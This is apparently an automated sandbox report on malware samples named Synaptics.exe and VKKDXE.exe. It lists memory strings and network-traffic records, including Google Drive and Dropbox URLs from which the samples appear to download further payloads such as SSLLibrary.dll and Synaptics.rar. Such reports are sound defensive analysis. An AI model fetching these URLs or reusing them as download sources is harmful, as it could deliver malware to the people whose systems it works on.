Source: Synaptics.exe, 00000006.00000002.1655867762.0000000005686000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1677357199.000000000E814000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000003.1395037597.0000000005681000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1663785176.000000000721F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadq
Source: Synaptics.exe, 00000006.00000002.1655867762.0000000005686000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000003.1395037597.0000000005681000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadqz
Source: Synaptics.exe, 00000006.00000002.1662569450.0000000007040000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1650418516.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1663785176.0000000007191000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr
Source: Synaptics.exe, 00000006.00000002.1677357199.000000000E814000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr-
Source: Synaptics.exe, 00000006.00000002.1650418516.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1650418516.00000000005AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrity
Source: Synaptics.exe, 00000006.00000002.1676364464.000000000E7C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadro
Source: Synaptics.exe, 00000006.00000002.1655867762.00000000056BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrver:
Source: Synaptics.exe, 00000006.00000002.1663785176.00000000071D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrvice:
Source: Synaptics.exe, 00000006.00000002.1662569450.000000000707E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrzw
Source: Synaptics.exe, 00000006.00000002.1650418516.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000003.1436494838.000000000709C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1662569450.00000000070A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1676364464.000000000E7C0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000003.1394556016.00000000005F9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000003.1437230556.00000000005E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloads
Source: Synaptics.exe, 00000006.00000002.1655867762.0000000005701000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000003.1392959426.00000000056FB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000003.1436015864.00000000056FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadsS
Source: Synaptics.exe, 00000006.00000002.1676364464.000000000E7C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadseC
Source: Synaptics.exe, 00000006.00000002.1663785176.0000000007167000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadservi
Source: Synaptics.exe, 00000006.00000002.1655867762.0000000005686000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000003.1395037597.0000000005681000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadsion=
Source: Synaptics.exe, 00000006.00000003.1436015864.000000000572B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt
Source: Synaptics.exe, 00000006.00000002.1655867762.00000000056BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt-Typ
Source: Synaptics.exe, 00000006.00000002.1676364464.000000000E7C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtaw
Source: Synaptics.exe, 00000006.00000002.1662569450.00000000070A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtent.
Source: Synaptics.exe, 00000006.00000002.1662569450.000000000707E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadthzx
Source: Synaptics.exe, 00000006.00000002.1663785176.0000000007100000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtion-nV
Source: Synaptics.exe, 00000006.00000002.1677357199.000000000E814000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadu
Source: Synaptics.exe, 00000006.00000002.1663785176.0000000007191000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadu1
Source: Synaptics.exe, 00000006.00000002.1655867762.0000000005717000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1655867762.00000000056BB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1662569450.000000000707E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000003.1436015864.0000000005717000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000003.1392959426.0000000005717000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1663785176.00000000071D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadv
Source: Synaptics.exe, 00000006.00000003.1395037597.0000000005681000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadvI
Source: Synaptics.exe, 00000006.00000003.1436494838.000000000709C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1662569450.00000000070A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadvK
Source: Synaptics.exe, 00000006.00000002.1662569450.000000000707E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadve
Source: Synaptics.exe, 00000006.00000002.1650418516.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000003.1394556016.00000000005F9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000003.1437230556.00000000005E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadw
Source: Synaptics.exe, 00000006.00000002.1655867762.00000000056BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadx
Source: Synaptics.exe, 00000006.00000002.1662569450.0000000007040000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1663785176.0000000007100000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1663785176.000000000721F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloady
Source: Synaptics.exe, 00000006.00000002.1662569450.000000000707E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyndicjcq
Source: Synaptics.exe, 00000006.00000002.1677357199.000000000E814000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadz
Source: Synaptics.exe, 00000006.00000002.1676364464.000000000E7C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadzZ7
Source: Synaptics.exe, 00000006.00000002.1662569450.000000000707E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1663785176.00000000071D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download~
Source: Synaptics.exe, 00000006.00000002.1650418516.00000000005AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download~=
Source: VKKDXE.exe, 00000000.00000003.1269288934.0000000002370000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloX
Source: VKKDXE.exe, 00000000.00000003.1269288934.0000000002370000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloXO
Source: Synaptics.exe.0.dr	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download
Source: Synaptics.exe, 00000006.00000002.1652445342.0000000002150000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloadN
Source: Synaptics.exe, 00000006.00000003.1394556016.00000000005D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/urity
Source: Synaptics.exe, 00000006.00000003.1394919128.0000000000609000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000003.1394556016.00000000005F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.)B
Source: Synaptics.exe, 00000006.00000002.1655867762.00000000056AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/
Source: Synaptics.exe, 00000006.00000002.1650418516.00000000005C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/&
Source: Synaptics.exe, 00000006.00000002.1678974963.000000000E8E2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/(
Source: Synaptics.exe, 00000006.00000002.1650418516.00000000005C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/Q
Source: Synaptics.exe, 00000006.00000002.1663785176.00000000071D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
Source: Synaptics.exe, 00000006.00000002.1663785176.00000000071D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.gw
Source: Synaptics.exe, 00000006.00000002.1655867762.0000000005660000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9
Source: Synaptics.exe, 00000006.00000002.1677357199.000000000E814000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadONTD~1
Source: Synaptics.exe, 00000006.00000002.1655867762.0000000005660000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadSmtP
Source: Synaptics.exe, 00000006.00000002.1663785176.00000000071D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadU
Source: Synaptics.exe, 00000006.00000002.1655867762.0000000005749000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadW
Source: Synaptics.exe, 00000006.00000002.1655867762.0000000005749000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_
Source: Synaptics.exe, 00000006.00000002.1663785176.00000000071D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadce
Source: Synaptics.exe, 00000006.00000003.1392959426.0000000005717000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloader-Poli
Source: Synaptics.exe, 00000006.00000002.1663785176.00000000071D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgl9
Source: Synaptics.exe, 00000006.00000002.1650418516.00000000005AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadk
Source: Synaptics.exe, 00000006.00000002.1663785176.00000000071D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadm
Source: Synaptics.exe, 00000006.00000002.1663785176.00000000071D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadna#
Source: Synaptics.exe, 00000006.00000002.1650418516.00000000005AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadndT
Source: Synaptics.exe, 00000006.00000002.1655867762.0000000005749000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloado
Source: Synaptics.exe, 00000006.00000002.1663785176.00000000071D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadou
Source: Synaptics.exe, 00000006.00000002.1663785176.00000000071D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadsez
Source: VKKDXE.exe, 00000000.00000003.1269288934.0000000002370000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=
Source: Synaptics.exe.0.dr	String found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1
Source: Synaptics.exe, 00000006.00000002.1652445342.0000000002150000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1:
Source: Synaptics.exe.0.dr	String found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1
Source: Synaptics.exe, 00000006.00000002.1652445342.0000000002150000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=16
Source: VKKDXE.exe, 00000000.00000003.1269288934.0000000002370000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dlL
Source: Synaptics.exe.0.dr	String found in binary or memory: https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1
Source: Synaptics.exe, 00000006.00000002.1652445342.0000000002150000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1:

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49864
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49863
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49984
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49862
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49982
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49980
Source: unknown	Network traffic detected: HTTP traffic on port 49932 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49898 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49878 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49984 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49979
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49856
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49855
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49854
Source: unknown	Network traffic detected: HTTP traffic on port 49889 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49900 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49853
Source: unknown	Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49855 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49909 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49901 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49844
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49844 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49918 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49930 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49836
Source: unknown	Network traffic detected: HTTP traffic on port 49887 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 49864 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 49870 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49856 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49853 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown	Network traffic detected: HTTP traffic on port 49907 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49836 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49871 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown	Network traffic detected: HTTP traffic on port 49980 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49934
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49899
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49932
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49898
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49931
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49930
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49862 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49919 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49879 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49809
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown	Network traffic detected: HTTP traffic on port 49882 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49802
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49889
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49888
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49887
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49920
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49863 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49882
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49854 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49908 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49982 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49919
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49918
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49917
Source: unknown	Network traffic detected: HTTP traffic on port 49809 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49979 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49879
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49878
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49871
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49870
Source: unknown	Network traffic detected: HTTP traffic on port 49917 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49931 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49899 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49909
Source: unknown	Network traffic detected: HTTP traffic on port 49934 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49908
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49907
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49920 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49901
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49900
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 49888 -> 443

Source: unknown	HTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.7:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.7:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.7:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.7:49719 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.7:49767 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.7:49768 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.7:49783 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.7:49782 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.7:49785 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.7:49784 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.7:49826 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.7:49827 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.7:49828 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.7:49829 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.7:49864 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.7:49871 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.7:49879 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.7:49908 version: TLS 1.2
